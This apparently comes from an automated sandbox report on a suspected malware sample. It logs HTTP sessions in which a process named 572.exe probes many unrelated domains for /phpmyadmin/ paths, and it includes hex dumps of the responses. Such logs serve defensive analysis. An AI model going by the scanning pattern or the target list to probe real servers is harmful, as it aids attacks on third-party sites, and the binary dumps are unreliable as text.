                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                247192.168.2.656290104.18.32.10980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.056809902 CET181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.191318035 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=C0okAsbog8HQOim82y8A0dtxa1TT2rXKEdpWRiS_Ncw-1707131692-1-AaCCF5wKz+RTseBMX6wyhxHWfFimdvblL3mBq8A5FlJsBiX/igET6K6Q9HB7wJj2EkwqNISYdZqVV4o65q1emC8=; path=/; expires=Mon, 05-Feb-24 11:44:52 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb73aefb1357-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f db 38 12 fe ee 5f 31 d5 2d 22 1b b0 64 a7 2f 97 5c 2c f9 d0 4d b3 b8 00 cd 6e 6f 9b 62 af 28 0a 83 22 c7 16 13 8a d4 92 b4 1d 6f ea ff 7e a0 28 d9 f2 4b b2 5b dc 01 01 62 92 c3 87 33 cf bc 90 a3 e4 c5 bb 5f 2e 6f 3f 7f b8 82 dc 16 62 dc 49 5e 44 d1 17 3e 05 61 e1 fa 0a ce be 8e 21 71 0b 40 05 31 26 0d a4 8a ee 0c 70 fc 3b 28 c1 38 06 20 88 9c a5 01 ca e8 d3 c7 60 0c c9 8b 2f 28 19 9f 7e 8d a2 2d 54 8d 03 70 1c ea ec fb a0 ce 9f 81 3a ff 0e a8 99 ad d1 dc c4 31 2b 0f 51 a2 68 17 29 47 c2 c6 9d c4 72 2b 70 fc d6 5a 94 96 2b 09 bf e2 ef 73 ae 91 bd 80 6f 70 29 d4 9c 4d 05 d1 98 0c bc 5c 27 29 d0 12 a0 39 d1 06 6d 1a 7c ba fd 29 3a 0f 60 d0 2c e4 d6 96 91 43 58 a4 c1 a5 92 0e 34 ba 5d 95 18 00 f5 a3 34 b0 f8 60 07 4e df d1 06 e6 39 94 ff 44 9f de 46 97 aa 28 89 e5 99 68 03 5d 5f a5 57 6c 86 ad 7d 92 14 98 06 5a 65 ca 9a 96 a0 54 5c 32 7c e8 83 54 53 25 84 5a 1e 6c 59 70 5c 96 4a db d6 a6 25 67 36 4f 19 2e 38 c5 a8 1a f4 b9 e4 96 13 11 19 4a 04 a6 a7 1e 45 70 79 0f 1a 45 1a 18 bb 12 68 72 44 1b 00 67 69 40 a7 13 3f 15 51 63 02 c8 35 4e d3 60 40 99 8c e8 8c 0f fc d2 80 4e 63 d4 5a 69 13 57 42 83 fd 18 fe c7 d7 f1 d3 47 84 db 23 38 ba 53 c2 3f 3d 85 63 73 d0 6e 34 54 82 e3 4c b1 d5 63 41 f4 8c cb 8b e1 a8 24 8c 71 39 bb 18 ae 13 0f 34 ee 74 5a 11 88 4e bf d3 61 1d 83 9d c4 50 cd 4b 3b ee 00 f0 29 74 5f 48 b2 e0 33 62 95 8e a9 52 f7 1c af 24 c9 04 b2 1e 3c 76 5c 0a 2c b9 64 6a 19 13 c6 ae 16 28 ed 7b 6e 2c 4a d4 dd f0 dd 2f 37 75 e4 bc 57 84 21 0b fb 30 9d 4b 5a 05 67 b7 d9 0d b0 20 1a 6a 60 01 29 30 45 e7 05 4a 1b cf d0 5e 09 74 3f 7f 5c 5d b3 6e e8 65 22 22 50 db b0 37 aa 77 37 3b e3 ca ae 98 71 53 0a b2 82 14 c2 4c 28 7a 1f 7a b9 75 af 03 b0 ee 24 83 c6 b4 83 2c ea 74 92 41 9d 48 8e 3b 67 7c c2 f8 a2 f6 7f b4 d4 a4 2c 51 07 e3 0a ae 5a a9 93 94 4e bd 4a d0 fc 88 2a 07
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 86dXmo8_1-"d/\,Mnob("o~(K[b3_.o?bI^D>a!q@1&p;(8 `/(~-Tp:1+Qh)Gr+pZ+sop)M\')9m|):`,CX4]4`N9DF(h]_Wl}ZeT\2|TS%ZlYp\J%g6O.8JEpyEhrDgi@?Qc5N`@NcZiWBG#8S?=csn4TLcA$q94tZNaPK;)t_H3bR$<v\,dj({n,J/7uW!0KZg j`)0EJ^t?\]ne""P7w7;qSL(zzu$,tAH;g|,QZNJ*
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.191345930 CET1286INData Raw: b9 61 ad 71 35 ae 23 a9 65 43 00 8c 58 12 59 4d a4 11 c4 a2 4b 71 47 ec c4 0b 99 60 fc 41 20 31 08 7e ba b6 d4 c4 c9 80 f1 45 4b 8f 5a c3 ea 94 88 a1 25 5c b8 9c d9 68 b7 b3 b0 67 c8 81 29 f5 b2 d3 de b1 e1 7f 79 04 b5 40 ed d2 6b b3 d5 55 bf d3
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: aq5#eCXYMKqG`A 1~EKZ%\hg)y@kU#*'nG+5,2Dd^41l/&R4&Vs UW[# &U0k8JA&>QR[T#J+Es!v v-Tp\SN+;
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.191360950 CET261INData Raw: e3 1c 5d 7b 00 29 9c fa 71 f5 0d 62 3b f4 8d 6b a9 0c af 9d 11 92 ac 7a c7 61 d8 16 b0 aa 84 14 86 ed a9 ea 92 dc 9b f3 97 a2 43 91 4a ee 22 2c b8 e1 19 17 ae 44 a5 10 fa 50 0f b7 71 ed da de 5d 83 87 0f 79 6f b4 29 0d 39 91 4c a0 76 9d 7b 4d 01
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ]{)qb;kzaCJ",DPq]yo)9Lv{Mb"|mR}UpHw?]DUhvoH%EB(q6PwO||]QQj\JJ=93t|EYN[Gw@{Jmbi=Zd
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.191375017 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                248192.168.2.656282172.67.170.14780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.057765961 CET182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.331006050 CET830INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://poligrafosecuador.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aRMJaVN3kiCs0dbUJ%2BpZNCvrqKfswd6KwHO5wRptrAy%2FX31BimfIk%2BB8WLGtxfdCl8II6LV%2F%2FFQi7XE9HJXs6NTnT%2F1qNlpwzJ57OvFTiYCY2sU7JK4e2K7I2A39jLBdN3o8deOVay4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb73a9491873-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.331022024 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                249192.168.2.656343192.185.5.2380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.071402073 CET175OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.241880894 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Server-Cache: true
                                                                                                                                                                                                                                                                                                                                                                X-Proxy-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=418220c063cd924bd4bb030f5a62a95a; path=/
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 6b 73 23 c9 95 25 f8 b9 d2 6c ff 83 57 c8 5a 95 39 4a 0f 84 3f c3 a3 8a a0 4c 55 ad de ee b1 66 8f 4c 8f 69 5b 53 c9 c6 40 20 92 88 aa 20 40 00 41 30 49 a9 fe fb 9e 73 3d 00 46 b2 52 a5 ec 69 cd ec ae d9 a6 31 1d 37 dc ef e3 dc 73 ce c5 e7 ff f8 df be f9 fd ff f5 9b 5f ab f5 70 db 5f be ba e0 8f ea 17 9b 9b 79 d1 6e f4 1f 7e 57 a8 65 bf 38 1c e6 c5 66 ab bf 3b 28 9c 87 e3 4d c1 c4 76 b1 c2 cf 6d 3b 2c d4 72 bd d8 1f da 61 5e fc e1 f7 ff a4 53 71 ba de 2c 6e db 79 71 ec da 87 bb ed 7e 40 a7 ed 66 68 37 48 7b e8 56 c3 7a be 6a 8f dd b2 d5 f2 f1 56 75 9b 6e e8 16 bd 3e 2c 17 7d 3b 37 6c d2 77 9b ef d5 be ed e7 c5 dd 7e fb ae eb db 42 ad f7 ed bb 79 31 9b dd dc de dd 94 db fd cd ec fd bb cd cc 30 fb d5 c5 61 b9 ef ee 86 cb d7 ef ee 37 cb a1 db 6e 5e 73 97 37 7f e6 59 ca 12 ff 06 3c 6a ae 3e bc 28 f7 ed 5d bf 58 b6 af 67 df 5e cb 8e df 5e cf de 7e f1 dd e1 8b 37 3f bc 79 bd da 2e ef 6f 01 b9 3c 05 bf ee 5b fe bc f9 ea 62 36 8e 7b 75 31 74 43 df 5e 5e dd f7 43 a7 fe 65 d5 2e 0e ea e7 3f 4b d6 98 af d4 7f bd 3f 0c 6a b1 d9 0e eb 76 af fe 7d bb 5f fd 66 df 1e 0e ea d0 0d ed c5 2c 97 4d b6 fc 62 b5 39 e8 3b 2c d8 0e cb f5 17 79 d5 2f 66 b3 77 60 ed 50 de 6c b7 37 7d bb b8 eb 0e e5 72 7b fb 85 9a 7d 42 e5 a1 7c 20 47 93 e4 17 3d 0f c3 62 e8 96 b9 e1 72 bf 3d 1c b6 fb ee a6 db e4 9e e8 07 c1 36 ed 72 78 31 ad 58 f4 43 bb df 2c 06 e8 31 3c de 41 e2 c5 dd 5d df 2d 17 24 7d b6 3f 1c 7e f1 fe b6 c7 13 f7 9b 17 1f f0 b2 5f ec ee b7 5f a9 7f 6a db d5 b3 96 b7 cc e8 98 40 24 b3 6e b3 6a df 97 77 eb bb d9 3b a4 cd 8a bf f7 f0 6f b6 b7 94 f0 f0 a9 28 96 63 fe 14 ce e7 5a ab df af bb 2c a5 ba 3f b4 07 05 8d d5 ff 29 22 a9 5f 6d 16 fd 23 88 3d a8 eb 47 75 b5 dd 1c 80 f8 5f 36 87 ee 66 8d a9 77 fd 3d 29 3e d6 65 5d 1a a5 d5 1f 0e dd e6 66 52 32 ec 17 cb ef 79 a5 d5 6c f6 f0 f0 50 de e6 06 dd d8 40 d0 29 ad 2f ff 8f 0c e3 df b6 43 fb e5 8f a6 00 1a 6c a7 96 f7 fb 3d b0 f7 8f 0a 52 be eb 6e ee f7 ed 4a 6d 37 00 3b 62 2f b1 46 9b b7 d8 3e 6c e0 d2 0d 96 04 88 ad 5a dc 63 a3 cd 40 66 5b f5 d0 0d eb 1f 6f d7 6d 64 eb 97 b3 0f ed 30 60 01 ac ba d8 b4 7d 49 ac 27 a8 ea 0f bf 02 92 55 cb 9c c9 0e b3 4f 62 4e f2 3f fb ec e2 b0 dc 77 77 c3 a8 fe d0 be 1f 66 df 2d 8e 8b 7c 5b 5c 22 e3 b3 07 a8 b7 7d 28 ff c7 c3 5d 7b bb fd ae fb dd 09 d0 5c fd b9 b8 5e 1c da 3f ec fb e2 cb 62 3d 0c 77 87 2f bf 9d 7d 3b 3b 94 0f e5 76 7f f3 ed ac bb 5d dc b4 87 6f a1 f9 be fd 76 26 c5 df ce 8c 29 6d 59 7d 3b ab ed fb da 7e 3b 2b de 16 98 89 fa f2 6e 73 83 8f c3 f1 e6 7f ae 1f 0a a5 1b 7e 7f 9d 1b 22 e2 f7 f6 7e bf 6c 8b 2f ff 5c 40 34 d2 cf b2 b1 bf b4 ff d0 aa df ce 1e ee 74 b7 59 f6 f7 2b 8e fa ee 20 17 52 a4 f7 6d 8f ac b6 bc ed 36 e5 77 87 5f 1e db fd 3c 94 a6 34 c5 0f 3f 7c 45 a2 3e 7f 77 bf 59 0e dd 76 f3 7a f1 f6 fa ed f2 cd 9f 4f df 6a c5 9b 37 7f 3e 2e f6 6a 39 ff dd 00 fb dd 94 ef f6 db db 6f d6 8b fd 37 50 f0 ab be 5c a2 f7 fe b7 ed 72 78 5d bd ad de 7e 5f 3e 74 ab
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67ks#%lWZ9J?LUfLi[S@ @A0Is=FRi17s_p_yn~We8f;(Mvm;,ra^Sq,nyq~@fh7H{VzjVun>,};7lw~By10a7n^s7Y<j>(]Xg^^~7?y.o<[b6{u1tC^^Ce.?K?jv}_f,Mb9;,y/fw`Pl7}r{}B| G=br=6rx1XC,1<A]-$}?~__j@$njw;o(cZ,?)"_m#=Gu_6fw=)>e]fR2ylP@)/Cl=RnJm7;b/F>lZc@f[omd0`}I'UObN?wwf-|[\"}(]{\^?b=w/};;v]ov&)mY};~;+ns~"~l/\@4tY+ Rm6w_<4?|E>wYvzOj7>.j9o7P\rx]~_>t
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.241911888 CET1286INData Raw: 61 8d df 75 4b bd de bc ed cb 77 5d df ff 1e 64 bd 5e 96 8b bb bb fe f1 35 7d f7 76 f1 06 e9 d5 9b af d8 7b 35 ff be 1c b6 ff b8 18 16 7f f8 ed bf be 7e f3 9f e8 7a 3d e9 da be e8 ba 6f 87 fb 3d 76 9a cf e7 ed 0f e7 15 db d7 8b bc e0 f5 57 dd bb
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: auKw]d^5}v{5~z=o=vWWnX_%5+fE*{}%2wrlzz\oCL)6~l>x~?A96irocW}<k>I_d7z`_Jh>tu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.241940022 CET1286INData Raw: db dd b7 fb c7 f1 e7 34 16 12 db d2 7f 30 f7 ef 3d 4a df 76 37 fb c5 d0 96 b7 dd e6 79 ac 87 b7 a6 53 9f 4d 33 9b 2d ee ba f2 a1 dc ee 6f 66 5f fc 35 63 74 9b 55 fb be bc 5b df 71 f4 77 87 ed 66 96 25 3d b7 29 7e bd ea 86 3f fc f6 5f 8a bc 48 b1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 40=Jv7ySM3-of_5ctU[qwf%=)~?_Hb?~S7xBnIDYbCptA<7)fv^]BmpnZj~}{8PB0vP/~_U%~h1"/u~,i.I
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.241954088 CET146INData Raw: 05 70 9d d7 3a 93 92 37 ff b1 3e d2 70 5c 5a 7e 3f ca 37 dc 94 2f 0f cb 7d 77 37 a8 e1 f1 ae 9d 7f 31 b4 ef 87 d9 77 8b e3 22 df 7e 71 f9 6a f6 5f d4 c5 e7 7f fc e6 1f 7f f5 fb 5f fd 51 fd 97 d9 ab e3 62 af 86 07 b4 7e 3c b4 47 fc b4 ed e6 77 cb
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: p:7>p\Z~?7/}w71w"~qj__Qb~<Gw=j\8oF-:Q<<}w-b-[}jno-
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.242147923 CET1286INData Raw: 66 63 63 0d 0a 2e d5 c5 fd a1 cd 22 7c 5b fc ec 23 2d de f7 dd e6 fb 2f ff 7a c2 e5 c5 b7 33 b4 40 a3 6f 67 80 74 59 fc f0 15 77 fb d3 9f 2e b9 d5 c5 2c 2f fc b7 f8 50 87 fd 72 fe c5 6c 76 7b df 0f 5d b7 6a 17 87 72 b9 bd 9d 3d dc 9d 08 9f 0d eb
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: fcc."|[#-/z3@ogtYw.,/Prlv{]jr==^P4p}w4~/;^/o%n[=teje>vUvAAaxK>lJ=taRpV*By0m9
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.242166042 CET1286INData Raw: a3 27 99 e6 fe 7c b5 01 bb 45 21 0a 55 99 0f 4e 67 8e 12 12 f8 65 eb e1 b4 5a c6 92 8c 53 79 3e 3a f9 a8 cf 71 ed 18 a7 2a cf 41 6c 02 05 61 ef aa b4 9e fb 61 61 c4 ce 13 3b 18 d7 19 3b e2 c4 fb 68 e2 d3 95 cb 7c 43 2e e7 9a 1d 58 e7 16 b6 8c d1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: '|E!UNgeZSy>:q*Alaaa;;h|C.XXF.JWy{*+{#v:(ry#d1wYtItPE*Kj $5#]tt|E7(B9.$j4ju5891kWifk1
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.242183924 CET1286INData Raw: a8 99 ce 9a 99 91 15 d4 d3 49 60 c5 09 58 4b 02 11 47 ef 06 71 ae 16 f8 14 4d 0b 93 d4 56 c6 64 1d 52 a8 33 48 ea 03 f0 b6 74 c9 0f d0 dc 33 6e 1a 73 14 12 9e 8a cb 8b d9 dd 62 58 5f be ba 98 1d 1e 6f af b7 3d a2 1c a8 6e 35 2f ba e5 76 a3 8f dd
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: I`XKGqMVdR3Ht3nsbX_o=n5/v-krYpMPve#%US;%1`&XH)bDqx?u5*(thtM^;D#.LGa*4&#eSc[
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.242197990 CET193INData Raw: 12 c3 fc 3a 26 e4 fb 24 f9 4d a4 aa c1 07 3c a4 18 11 27 ba dd bb b4 46 01 ca 38 07 63 45 e7 e4 b4 3c 8d 25 fa 54 82 5e 5a 7a ed c0 5c b2 86 ee 0a 75 1e ae 4f c3 c1 16 21 bb 98 c1 6a 01 7b 1c 97 a1 db b8 41 85 4b 8e af ec 20 a7 5c ac b1 b9 4d 71
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: :&$M<'F8cE<%T^Zz\uO!j{AK \Mq7wSYx*:ZQ5T{U>8Vs3A?ih($qt}-0bQ5K7|iESsU
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.242214918 CET1286INData Raw: 36 38 0d 0a b0 70 41 39 e5 65 90 0a 7d ae 68 b8 48 ee 44 4d c6 01 51 f6 c3 dc 9d 30 0f a9 1a a0 15 9c fa 84 b3 89 24 82 23 8d b4 b1 65 15 1d 71 3a 2a eb d3 d3 15 f8 a8 4b 6f a1 5f c3 1f 70 90 bd c7 9c 06 bb 57 06 dc cb 8f 92 ab 67 32 25 0f 64 ca
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 68pA9e}hHDMQ0$#eq:*Ko_pWg2%dcOaRt2&f5cbv.fm([ne=:vb-j`l+d2~r102Pr1rCxKp{sZ0<
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.242230892 CET1286INData Raw: 91 f7 8d 31 fd e9 15 2c ee 4e 7d 32 33 d0 99 ee 6b d2 90 19 ab 46 3f 42 1a 75 9a d2 88 70 55 74 bd 74 60 5c a3 cf b9 07 bc 4d 4d 52 b6 39 0b 6a 27 cf e0 5a 9f c6 a1 2d 57 ab 8d cf 7d 77 da 8b 1b 0d 29 d0 51 ac e2 cb 26 84 81 66 36 51 27 4e 84 a5
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1,N}23kF?BupUtt`\MMR9j'Z-W}w)Q&f6Q'N]YA'"9hy}5eN(2|;}R7fps>mF+h4hg-yqjgS<C:)|%got:;g1s*Q_&eMyK>]2S|V=S$_I|"G
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.344187975 CET1286INData Raw: b3 53 36 3e 42 54 47 63 4b 1c 78 7e 9a 99 1e b7 f7 c3 fd 75 fb c2 49 b6 fe 69 27 99 5a d0 59 4b a9 8e ae ac 63 02 7f 86 70 b0 4a 04 a8 53 ec 8d 11 3f 8c 4b 36 ee a8 03 45 d9 c9 47 be 52 93 67 95 cb 2b 35 69 f3 74 65 1d 6b 64 9e b3 47 a4 5b b3 86
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: S6>BTGcKx~uIi'ZYKcpJS?K6EGRg+5itekdG[Zv6G:%~42l9CSNite2)"F3GQ6SV&Dvd>3sY:bgxp>M1T212CM!lo,dL9jW9'cI


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                250192.168.2.656340138.197.59.19980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.091041088 CET184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.230267048 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


